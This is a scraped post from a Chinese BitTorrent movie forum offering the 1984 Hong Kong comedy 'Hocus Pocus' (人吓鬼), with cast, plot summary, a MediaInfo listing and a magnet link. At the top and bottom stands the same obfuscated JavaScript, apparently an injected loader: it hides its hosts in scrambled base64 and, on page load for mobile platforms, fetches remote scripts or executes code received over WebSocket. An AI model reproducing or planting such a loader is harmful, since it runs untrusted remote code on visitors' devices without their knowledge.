人吓鬼[国粤语配音/中文字幕].Hocus.Pocus.1984.1080p.BluRay.x265.10bit.DD.2.0.2Audio 5.18GB

版主小s 1月前 295

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 人吓鬼 / Hocus Pocus / Hogus Pogus

◎年 代 1984

◎产 地 中国香港

◎类 别 喜剧 / 奇幻

◎语 言 粤语

◎上映日期 1984-01-12

◎IMDb链接 https://www.imdb.com/title/tt0087993/

◎豆瓣评分 6.8/10 (5648人评价)

◎豆瓣链接 https://movie.douban.com/subject/2003667/

◎片 长 93 分钟

◎导 演 钱月笙 Yuet Sang Chin (id:1322806)

◎演 员 林正英 Ching-Ying Lam (id:1016823)

董玮 Wai Tung (id:1299617)

陈龙 Peter Chan Lung (id:1321791)

罗浩楷 Ho Kai Law (id:1329430)

钱月笙 Yuet Sang Chin (id:1322806)

刘雅丽 Alice Lau (id:1274633)

午马 Wu Ma (id:1054282)

泰山 San Tai (id:1423731)

沙鸥 Ou Sha (id:1423762)

洪金宝 Sammo Hung Kam-Bo (id:1055887)

刘观伟 Ricky Lau (id:1038428)

周少龙 Shao Lung Chou (id:1344862)

◎标 签 林正英 / 香港 / 恐怖 / 僵尸 / 喜剧 / 香港电影 / 动作 / 1984

◎简 介

这是一个发生在上个世纪80年代香港戏班里的故事。戏班里顽皮捣蛋的武生阿贵(董玮 饰)经常扮鬼吓人,连戏班的台柱新少佳都经常被他捉弄,大家对他既气愤,亦无可奈何。

这次,当阿贵又扮鬼吓人时,岂料碰上了真鬼——潮州鬼。阿贵吓得屁滚尿流,幸好戏班里的老衣箱声叔(林正英 饰)这方面经验丰富,他得知潮州鬼生前被人分尸,死后才冤魂不散。为了让潮州鬼安息,声叔和阿贵决定找全潮州鬼的尸骸。不料却错挖了另一个恶鬼的尸骸,一时间,戏班被恶鬼弄得乌烟瘴气,声叔决定和阿贵一起扮天师吓走恶鬼。

◎获奖情况 (共1项)

第4届香港电影金像奖 (1985)

最佳服装造型设计(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 231018917882855261914031193354673512911 (0xADCCA00AF2ADD09B070EB00FBBD2E1CF)

  4. Complete name : [email protected]DDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 5.18 GiB

  8. Duration : 1 h 33 min

  9. Overall bit rate : 7 898 kb/s

  10. Movie name : Hocus.Pocus

  11. Encoded date : UTC 2021-10-01 07:36:32

  12. Writing application : mkvmerge v51.0.0 ('I Wish') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@Main

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 33 min

  21. Bit rate : 7 100 kb/s

  22. Width : 1 920 pixels

  23. Height : 816 pixels

  24. Display aspect ratio : 2.35:1

  25. Frame rate mode : Constant

  26. Frame rate : 24.000 FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.189

  31. Stream size : 4.66 GiB (90%)

  32. Writing library : x265 3.4+1-g07e3381df+31:[Windows][GCC 10.1.0][64 bit] Yuuki 10bit+8bit+12bit

  33. Encoding settings : rc=crf / crf=19.0000 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.70 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=3 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.01 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  34. Default : Yes

  35. Forced : No


  36. Audio #1

  37. ID : 2

  38. ID in the original source medium : 4352 (0x1100)

  39. Format : AC-3

  40. Format/Info : Audio Coding 3

  41. Commercial name : Dolby Digital

  42. Codec ID : A_AC3

  43. Duration : 1 h 33 min

  44. Bit rate mode : Constant

  45. Bit rate : 384 kb/s

  46. Channel(s) : 2 channels

  47. Channel layout : L R

  48. Sampling rate : 48.0 kHz

  49. Frame rate : 31.250 FPS (1536 SPF)

  50. Compression mode : Lossy

  51. Stream size : 258 MiB (5%)

  52. Title : Cantonese

  53. Language : Chinese

  54. Service kind : Complete Main

  55. Default : Yes

  56. Forced : No

  57. Original source medium : Blu-ray


  58. Audio #2

  59. ID : 3

  60. ID in the original source medium : 4353 (0x1101)

  61. Format : AC-3

  62. Format/Info : Audio Coding 3

  63. Commercial name : Dolby Digital

  64. Codec ID : A_AC3

  65. Duration : 1 h 33 min

  66. Bit rate mode : Constant

  67. Bit rate : 384 kb/s

  68. Channel(s) : 2 channels

  69. Channel layout : L R

  70. Sampling rate : 48.0 kHz

  71. Frame rate : 31.250 FPS (1536 SPF)

  72. Compression mode : Lossy

  73. Stream size : 258 MiB (5%)

  74. Title : Mandarin

  75. Language : Chinese

  76. Service kind : Complete Main

  77. Default : No

  78. Forced : No

  79. Original source medium : Blu-ray


  80. Text #1

  81. ID : 4

  82. ID in the original source medium : 4609 (0x1201)

  83. Format : PGS

  84. Muxing mode : zlib

  85. Codec ID : S_HDMV/PGS

  86. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  87. Duration : 1 h 31 min

  88. Bit rate : 28.0 kb/s

  89. Count of elements : 1458

  90. Stream size : 18.3 MiB (0%)

  91. Title : chs

  92. Language : Chinese

  93. Default : Yes

  94. Forced : No

  95. Original source medium : Blu-ray


  96. Text #2

  97. ID : 5

  98. ID in the original source medium : 4608 (0x1200)

  99. Format : PGS

  100. Muxing mode : zlib

  101. Codec ID : S_HDMV/PGS

  102. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  103. Duration : 1 h 31 min

  104. Bit rate : 28.6 kb/s

  105. Count of elements : 1458

  106. Stream size : 18.7 MiB (0%)

  107. Title : cht

  108. Language : Chinese

  109. Default : No

  110. Forced : No

  111. Original source medium : Blu-ray


  112. Text #3

  113. ID : 6

  114. ID in the original source medium : 4610 (0x1202)

  115. Format : PGS

  116. Muxing mode : zlib

  117. Codec ID : S_HDMV/PGS

  118. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  119. Duration : 1 h 31 min

  120. Bit rate : 22.8 kb/s

  121. Count of elements : 1458

  122. Stream size : 14.9 MiB (0%)

  123. Title : eng

  124. Language : English

  125. Default : No

  126. Forced : No

  127. Original source medium : Blu-ray


  128. Menu

  129. 00:00:00.000 : en:第 01 章

  130. 00:08:05.458 : en:第 02 章

  131. 00:16:14.375 : en:第 03 章

  132. 00:23:23.541 : en:第 04 章

  133. 00:33:44.166 : en:第 05 章

  134. 00:40:40.416 : en:第 06 章

  135. 00:46:59.208 : en:第 07 章

  136. 00:53:49.916 : en:第 08 章

  137. 01:00:41.583 : en:第 09 章

  138. 01:11:29.833 : en:第 10 章

  139. 01:18:37.666 : en:第 11 章

  140. 01:24:41.333 : en:第 12 章




复制代码


TAGS 奇幻 喜剧

磁力链:
  • magnet:?xt=urn:btih:322EA1F52CCB4460B5C96D03E6E729D1F46F3389

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};